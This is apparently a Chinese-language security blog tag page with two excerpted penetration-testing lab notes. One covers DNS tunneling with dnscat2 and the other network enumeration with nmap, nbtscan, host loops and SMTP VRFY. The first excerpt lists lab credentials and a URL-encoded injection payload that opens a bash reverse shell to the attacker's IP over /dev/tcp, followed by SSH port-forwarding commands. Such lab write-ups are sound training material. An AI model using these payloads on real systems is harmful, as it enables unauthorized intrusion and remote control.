發表文章

目前顯示的是有「dns」標籤的文章

DNS Tunneling - Dnscat2

圖片
 DNS Tunneling - Dnscat2 場景示意圖 kali 攻擊機 192.168.45.244 靶機  - 192.168.244.7 (kali / 7he_C4t_c0ntro11er) : Domain feline.corp Name Server  - 192.168.244.63 (Web)  - 192.168.244.64 (Internal DNS Server)  - 10.4.244.215 (database_admin / sqlpass123) : Client 先看一下 feline.corp Name Server sh kali@192.168.244.7 hostname whoami ls cat dnsmasq.conf --> DNS 伺服器最小配置 啟動 DNS Server,sudo dnsmasq -C dnsmasq.conf -d 再連一個 SSH Shell 然後做 tcpdump for UDP 53 port 指令 sudo tcpdump -i ens192 udp port 53 第一步漏洞入侵 Web curl -v http://192.168.244.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.244/4444%200%3E%261%27%29.start%28%29%22%29%7D/ 然後確保 TTY, python3 -c 'import pty; pty.spawn("/bin/bash")' 走 SSH Tunneling 攻擊機掛載 2222 Port 對應到 DB Server 22 Port ssh -N -R 127.0.0.1:2222:10.4.244.215:22 kali@192.168.45.244 第一次連...

枚舉隨手筆記

圖片
  枚舉 隨手筆記 一次查詢多筆 DNS 紀錄,先建立一個 list.txt 檔案接著使用下列指令進行查詢 └─$ for ip in $(cat list.txt); do host $ip.asus.com; done DNS 批次查詢 103.10.4.200 ~ 103.10.4.254,輸出時過濾掉字串中有 "not found" 不存在的紀錄 即可一次批次查詢某範圍內的 IP 並存在的紀錄 指令 └─$ for ip in $(seq 200 254); do host 103.10.4.$ip; done | grep -v "not found" SMB 枚舉指令,掃 139,445 時,枚舉完寫入檔案 smb.txt,確認哪個 IP 有開這兩個 Port 指令 : nmap -v -p 139,445 -oG smb.txt 192.168.203.1-254 下一步針對有開 139、445 的 IP 進行 nbtscan 查找 NetBIOS name 指令 : sudo nbtscan -r 192.168.203.0/24/  看一下 nmap 有哪些 SMB scripts 指令 : ls -l /usr/share/nmap/scripts/smb* 查用的第一個就是 smb-os-discovery 針對特定 IP 使用該 Script,包含 139 & 445 Port 指令 : nmap -v -p 139,445 --script  smb-os-discovery 192.168.203.10 Windows 使用指令 net view \\<domain name or IP> /all 可以看分享的資料夾,如下圖 SMTP 枚舉,要確認收件者帳號最好用的指令是 VRFY,透過 nc -nv 登入目標 25 Port 後 直接下 VRFY 接帳號即可確認,但真實世界的大部分 SMTP Server 都會拒絕 VRFY 列舉使用者 Github 也有提供 smtp.py 確認 VRFY 的相關檔案 例如 :  https://github.com/OpenSecurityResearch/pentest-scripts/blob/master/smtp-vrfy...